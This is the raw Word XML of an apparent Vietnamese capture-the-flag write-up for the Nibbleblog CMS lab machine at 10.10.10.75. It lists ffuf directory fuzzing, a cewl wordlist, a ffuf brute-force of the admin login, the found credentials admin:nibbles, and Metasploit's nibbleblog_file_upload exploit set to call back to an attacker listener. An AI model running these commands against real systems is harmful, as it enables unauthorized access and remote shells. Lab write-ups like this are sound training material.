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C3A8A" w14:textId="3E69A8F3" w:rsidR="002F49FE" w:rsidRDefault="00F6588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0F933A" wp14:editId="4EB2DA33">
            <wp:extent cx="5943600" cy="2277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449F" w14:textId="24EC7981" w:rsidR="00F65882" w:rsidRDefault="00F65882">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFE1984" w14:textId="1331F5F4" w:rsidR="00F65882" w:rsidRDefault="003932D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79C9A2" wp14:editId="719B27AB">
            <wp:extent cx="4334494" cy="331406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1" t="17268" r="56442" b="41179"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4347189" cy="332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554D9" w14:textId="0D85066A" w:rsidR="007E7B7C" w:rsidRDefault="007E7B7C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4353D478" w14:textId="506BF810" w:rsidR="007E7B7C" w:rsidRPr="007E7B7C" w:rsidRDefault="007E7B7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nibbleblog là tên 1 CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0851B7" w14:textId="42C49508" w:rsidR="003932DF" w:rsidRDefault="003932DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A963DEF" w14:textId="138599A1" w:rsidR="00DB7707" w:rsidRPr="00DB7707" w:rsidRDefault="00DB7707">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7707">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://10.10.10.75/nibbleblog/FUZZ/ -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07637482" w14:textId="77777777" w:rsidR="00DB7707" w:rsidRDefault="00DB7707">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA96680" w14:textId="092C8084" w:rsidR="00AD6F1C" w:rsidRDefault="00AD6F1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Tìm được các điểm vào: admin, plugins, content, languages,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4AF61D" w14:textId="55D065D0" w:rsidR="00AD6F1C" w:rsidRDefault="00AD6F1C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36DECE01" w14:textId="3A0AF3E8" w:rsidR="00AD6F1C" w:rsidRDefault="00AD6F1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Trang web bị lỗi index nên các thư mục hiển thị tập tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513BD8AE" w14:textId="7FF47D66" w:rsidR="00AD6F1C" w:rsidRDefault="00AD6F1C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617BAB5D" w14:textId="386673F9" w:rsidR="00AD6F1C" w:rsidRPr="00061373" w:rsidRDefault="00711235">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061373">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.10.10.75/nibbleblog/content/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7BE947" w14:textId="78DE2D47" w:rsidR="00711235" w:rsidRDefault="00711235">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7C053C" w14:textId="77777777" w:rsidR="00DB7707" w:rsidRDefault="00DB7707">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198FDB3F" w14:textId="600EA726" w:rsidR="00711235" w:rsidRDefault="0006137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373BDB3" wp14:editId="2B005321">
            <wp:extent cx="4649314" cy="32063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446" cy="321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3ED0" w14:textId="03F1F329" w:rsidR="00061373" w:rsidRPr="00DB7707" w:rsidRDefault="00DB7707">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7707">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.10.10.75/nibbleblog/admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D545B82" w14:textId="0D79497D" w:rsidR="00061373" w:rsidRDefault="00DB770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468CAB0" wp14:editId="0C8F8496">
            <wp:extent cx="4721374" cy="4049486"/>
            <wp:effectExtent l="0" t="0" r="317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658" cy="406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04F9" w14:textId="389C7FA7" w:rsidR="00DB7707" w:rsidRDefault="00DB7707">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D9F02D" w14:textId="35C8E837" w:rsidR="00DB7707" w:rsidRDefault="009F68FA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F68FA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.75/nibbleblog/FUZZ -c -e .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77814B96" w14:textId="363DAFE1" w:rsidR="009F68FA" w:rsidRDefault="009F68FA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77912446" w14:textId="2891DD53" w:rsidR="009F68FA" w:rsidRDefault="0066221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Tìm được trang admin.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE48979" w14:textId="207ADC5F" w:rsidR="00662213" w:rsidRDefault="00662213">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2464F444" w14:textId="346B7D72" w:rsidR="00662213" w:rsidRDefault="00DF04A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7E123AE" wp14:editId="194CDA9D">
            <wp:extent cx="3383752" cy="225522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80" t="16630" r="19267" b="22637"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3385034" cy="2256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85209" w14:textId="2C2FF205" w:rsidR="00DF04AC" w:rsidRDefault="00DF04AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46647FFC" w14:textId="34CFAB25" w:rsidR="00DF04AC" w:rsidRDefault="00DA4D9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Tìm được tài khoản hợp lệ: admin: nibbles (đoán thủ công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE570A7" w14:textId="061F71B7" w:rsidR="00DA4D92" w:rsidRDefault="00DA4D92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5A320C" w14:textId="78176290" w:rsidR="00DA4D92" w:rsidRPr="00506EDD" w:rsidRDefault="00C62929">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00506EDD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl -d  3 -m 6 </w:t>
      </w:r>
      <w:r w:rsidR="00D1448E" w:rsidRPr="00506EDD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--lowercase </w:t>
      </w:r>
      <w:r w:rsidRPr="00506EDD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-w wordlists.txt http://10.10.10.75/nibbleblog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA9D8F" w14:textId="1A7B4F5E" w:rsidR="00C62929" w:rsidRDefault="00C62929">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A08984" w14:textId="52B479EB" w:rsidR="00C62929" w:rsidRDefault="00D1448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7034A3E" wp14:editId="74F057B1">
            <wp:extent cx="5943600" cy="24618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10FF" w14:textId="13B704AB" w:rsidR="00506EDD" w:rsidRDefault="00506EDD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3ADBAD" w14:textId="511408F2" w:rsidR="00506EDD" w:rsidRPr="00477A2D" w:rsidRDefault="00477A2D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00477A2D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists.txt -X POST -d "username=admin&amp;password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.10.75/nibbleblog/admin.php -fr "Incorrect username or password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A80B9A" w14:textId="31D1C4B3" w:rsidR="00477A2D" w:rsidRDefault="00477A2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5773D1E1" w14:textId="77777777" w:rsidR="00477A2D" w:rsidRDefault="00477A2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444A3088" w14:textId="1925CF30" w:rsidR="00D1448E" w:rsidRDefault="00477A2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Nó báo lỗi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00477A2D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nibbleblog security error - Blacklist protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A3369" w14:textId="65D37D96" w:rsidR="00477A2D" w:rsidRDefault="00477A2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D85D228" w14:textId="266C9CD6" w:rsidR="00477A2D" w:rsidRDefault="00A1697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tấn công nhanh quá nên nó</w:t>
      </w:r>
      <w:r w:rsidR="00B05B78">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chặn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mình đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2DD04" w14:textId="78758CC9" w:rsidR="00A1697A" w:rsidRDefault="00A1697A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A6ECE9" w14:textId="3EA5B5C9" w:rsidR="00A1697A" w:rsidRDefault="00BF115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Vì wordlists nhỏ nên mình có thể làm bằng tay</w:t>
      </w:r>
      <w:r w:rsidR="00390C58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763BC4B8" w14:textId="6DF6CBD7" w:rsidR="00390C58" w:rsidRDefault="00390C58">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF6E0D5" w14:textId="612B026E" w:rsidR="00390C58" w:rsidRDefault="002A5E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Giao diện trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A092B00" w14:textId="5CC36E33" w:rsidR="002A5EA4" w:rsidRDefault="002A5EA4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50677424" w14:textId="43F2A71F" w:rsidR="002A5EA4" w:rsidRDefault="00B05B7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E992CA5" wp14:editId="0F65802B">
            <wp:extent cx="4902964" cy="2790702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1" t="16947" r="9685" b="7897"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4904878" cy="2791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21E43" w14:textId="1F4FCD8E" w:rsidR="00C1521A" w:rsidRDefault="00C1521A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3923E26F" w14:textId="079AAC97" w:rsidR="00D645F4" w:rsidRDefault="00D645F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tìm được 1 CVE có thể khai thác nibbleblog phiên bản 4.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCE8B2" w14:textId="77777777" w:rsidR="00D645F4" w:rsidRDefault="00D645F4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A58C4DB" w14:textId="29F449CF" w:rsidR="00B05B78" w:rsidRDefault="00F759F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3470234" wp14:editId="7400A6A4">
            <wp:extent cx="4495800" cy="1168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4120" w14:textId="595F5C38" w:rsidR="008156A1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4307B9AD" w14:textId="3A61B57F" w:rsidR="008156A1" w:rsidRPr="00B913E1" w:rsidRDefault="000C0298">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/multi/http/nibbleblog_file_upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4F16A" w14:textId="5F7F3127" w:rsidR="00B913E1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set lhost 10.10.14.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D830E" w14:textId="42323168" w:rsidR="00B913E1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set rhosts 10.10.10.75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E2D90" w14:textId="4C153A4C" w:rsidR="00B913E1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set username admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A6600" w14:textId="11A22F59" w:rsidR="00B913E1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set password nibbles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF12EC" w14:textId="5619A6D7" w:rsidR="00B913E1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set targeturi /</w:t>
      </w:r>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nibbleblog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31226AF6" w14:textId="53DBCB3C" w:rsidR="00B913E1" w:rsidRPr="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B913E1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210A759" w14:textId="29EE7000" w:rsidR="00B913E1" w:rsidRDefault="0034679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1A27706" wp14:editId="5543ED2B">
            <wp:extent cx="5943600" cy="10960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622F" w14:textId="77777777" w:rsidR="00B913E1" w:rsidRDefault="00B913E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AF2B6D" w14:textId="15BBA4FC" w:rsidR="000C0298" w:rsidRDefault="00A334F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70C728D" wp14:editId="188A8922">
            <wp:extent cx="4165600" cy="812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F64A" w14:textId="77777777" w:rsidR="00A334F6" w:rsidRDefault="00A334F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DF5393" w14:textId="0EEAB8DC" w:rsidR="00F759FF" w:rsidRDefault="00262B2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261147F" wp14:editId="5B600D4A">
            <wp:extent cx="5943600" cy="9950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114F" w14:textId="77777777" w:rsidR="00B05B78" w:rsidRDefault="00B05B78">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277B326A" w14:textId="129E1066" w:rsidR="00BF115A" w:rsidRDefault="000332B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2B6C534" wp14:editId="2C068EB9">
            <wp:extent cx="3695700" cy="977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E379" w14:textId="77777777" w:rsidR="00477A2D" w:rsidRDefault="00477A2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171C12C3" w14:textId="6658BDA5" w:rsidR="00D1448E" w:rsidRDefault="00855E0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D2E474C" wp14:editId="3F48C921">
            <wp:extent cx="5943600" cy="24466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47CB" w14:textId="6F7F2351" w:rsidR="00855E02" w:rsidRDefault="00855E02">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7ABBE7" w14:textId="6E315FF1" w:rsidR="00855E02" w:rsidRPr="00E13EFB" w:rsidRDefault="00855E0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73A97FC" wp14:editId="0A619C05">
            <wp:extent cx="3390900" cy="64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E02" w:rsidRPr="00E13E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447"/>
    <w:rsid w:val="000332BA"/>
    <w:rsid w:val="00061373"/>
    <w:rsid w:val="000C0298"/>
    <w:rsid w:val="00262B29"/>
    <w:rsid w:val="002A5EA4"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0034679D"/>
    <w:rsid w:val="00390C58"/>
    <w:rsid w:val="003932DF"/>
    <w:rsid w:val="003E2469"/>
    <w:rsid w:val="00477A2D"/>
    <w:rsid w:val="00506EDD"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00662213"/>
    <w:rsid w:val="00711235"/>
    <w:rsid w:val="00736447"/>
    <w:rsid w:val="007E7B7C"/>
    <w:rsid w:val="008156A1"/>
    <w:rsid w:val="00855E02"/>
    <w:rsid w:val="009F68FA"/>
    <w:rsid w:val="00A1697A"/>
    <w:rsid w:val="00A334F6"/>
    <w:rsid w:val="00AD6F1C"/>
    <w:rsid w:val="00B05B78"/>
    <w:rsid w:val="00B913E1"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF115A"/>
    <w:rsid w:val="00C1521A"/>
    <w:rsid w:val="00C62929"/>
    <w:rsid w:val="00D1448E"/>
    <w:rsid w:val="00D645F4"/>
    <w:rsid w:val="00DA4D92"/>
    <w:rsid w:val="00DB7707"/>
    <w:rsid w:val="00DF04AC"/>
    <w:rsid w:val="00E13EFB"/>
    <w:rsid w:val="00F65882"/>
    <w:rsid w:val="00F75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448D765"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE156752-C9C8-2E4D-8331-86D03244F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34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-07T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-07T09:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>